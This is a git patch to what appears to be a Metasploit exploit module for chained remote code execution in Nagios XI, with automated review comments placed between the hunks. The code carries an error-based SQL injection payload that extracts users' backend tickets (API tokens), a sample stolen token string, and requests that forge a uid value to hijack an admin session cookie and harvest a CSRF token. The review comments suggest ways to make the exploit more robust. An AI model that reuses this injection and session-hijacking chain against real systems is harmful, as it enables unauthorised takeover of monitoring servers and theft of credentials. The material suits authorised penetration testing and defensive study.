From 3e8cdd1f36e007939b44eb6ab01862c4db36f2b0 Mon Sep 17 00:00:00 2001
From: William Vu
Date: Wed, 30 Nov 2016 14:10:10 -0600
Subject: [PATCH] Polish up USER_ID and API_TOKEN options
---
 .../linux/http/nagios_xi_chained_rce.rb | 24 +++++++++++--------
 1 file changed, 14 insertions(+), 10 deletions(-)
diff --git a/modules/exploits/linux/http/nagios_xi_chained_rce.rb b/modules/exploits/linux/http/nagios_xi_chained_rce.rb
index 1dc893f9f2..129e62ffa1 100644
--- a/modules/exploits/linux/http/nagios_xi_chained_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_chained_rce.rb
@@ -44,10 +44,11 @@ class MetasploitModule < Msf::Exploit::Remote
         'LHOST' => Rex::Socket.source_address
       }
     ))
+
     register_options([
-      OptInt.new('USERID', [ true, 'User ID in the database to target', 1 ]),
-      OptString.new('APITOKEN', [ false, 'If an API Token was already stolen, skip the sqli', '8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6gm' ])
-    ], self.class)
+      OptInt.new('USER_ID', [true, 'User ID in the database to target', 1]),
+      OptString.new('API_TOKEN', [false, 'If an API token was already stolen, skip the SQLi'])
+    ])
   end
 
   def check
@@ -73,8 +74,8 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NotVulnerable, 'Vulnerable version not found! punt!')
     end
 
-    unless datastore['APITOKEN'].empty?
-      @api_token = datastore['APITOKEN']
+    if datastore['API_TOKEN']
+      @api_token = datastore['API_TOKEN']
     else
       print_status('Getting API token')
       get_api_token
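Review bot: The `if datastore['API_TOKEN']` guard in the second hunk treats an empty string as a usable token, which the `.empty?` check it replaces did not; because the option registered in the first hunk is optional with no default, an empty value handed back by the datastore is truthy in Ruby, skips `get_api_token`, and leaves `@api_token = ''` to be hashed later. Normalise before branching, e.g. `token = datastore['API_TOKEN'].to_s.strip` followed by `if token.empty?` with the two branches swapped. Whether the framework ever yields `''` rather than `nil` for an unset OptString is not visible here, so this is a defensive change rather than a confirmed failure. The enclosing method starts before the second hunk and continues after it.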
@@ -125,15 +126,17 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_get' => {
         'mode' => 'resolve',
         'host' => '\'AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT((' \
-                  "SELECT backend_ticket FROM xi_users WHERE user_id=#{datastore['USERID']}" \
+                  "SELECT backend_ticket FROM xi_users WHERE user_id=#{datastore['USER_ID']}" \
                   '),FLOOR(RAND(0)*2))x ' \
                   'FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '
       }
     )
+
+    # default admin token is shorter, ie 27o3b7mu1 shortened to 27o3b7mu
+    # any other user has a longer token, but we cant strip the last char off.
+    # example: 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g
     if res && res.body =~ /Duplicate entry '(.*?).'/
-      if $1.length > 8 # default admin token is shorter, ie 27o3b7mu1 shortened to 27o3b7mu
-        # any other user has a longer token, but we cant strip the last char off.
-        # example: 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g
+      if $1.length > 8
         res.body =~ /Duplicate entry '(.*?)'/
       end
       @api_token = $1
@@ -148,10 +151,11 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET',
       'uri' => '/nagiosxi/rr.php',
       'vars_get' => {
-        'uid' => "#{datastore['USERID']}-#{Rex::Text.rand_text_alpha(8)}-" +
+        'uid' => "#{datastore['USER_ID']}-#{Rex::Text.rand_text_alpha(8)}-" +
                  Digest::MD5.hexdigest(@api_token)
       }
     )
+
     if res && (@admin_cookie = res.get_cookies.split('; ').last)
       vprint_good("Admin cookie: #{@admin_cookie}")
       get_csrf_token(res.body)
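Review bot: The relocated comment now sits above the outer `if res && res.body =~ ...` line, three lines away from the `if $1.length > 8` test it explains, and it still does not say where the stripped character comes from. The query above concatenates `FLOOR(RAND(0)*2)` onto `backend_ticket`, so the trailing `.` in the first regex exists to drop that appended 0/1; the second regex keeps the full capture for longer tokens, presumably because the reported duplicate value is already cut short and the digit is gone — confirm against an actual response. I would place the explanation directly above `if $1.length > 8` and state the mechanism, e.g. `# CONCAT appended FLOOR(RAND(0)*2); the first regex's trailing '.' drops that digit` followed by one line noting that longer tokens are re-matched without stripping. Carrying `$1` across two `=~` calls is also fragile; assigning the result of `res.body.match(...)` to a local and reading `[1]` makes the data flow explicit. The enclosing method starts before the hunk and the path taken when the regex does not match is outside it.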
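Review bot: `Digest::MD5.hexdigest(@api_token)` on the `uid` line still assumes `@api_token` was set, but `get_api_token` in the previous hunk only assigns it inside `if res && res.body =~ ...`, so a request failure or a non-matching body leaves it `nil` and `hexdigest` raises a `TypeError` instead of a clean module failure. Unless the branch outside that hunk already calls `fail_with`, a guard before this request such as `fail_with(Failure::Unknown, 'Could not obtain an API token') unless @api_token` would report the condition clearly. The enclosing method begins before the hunk.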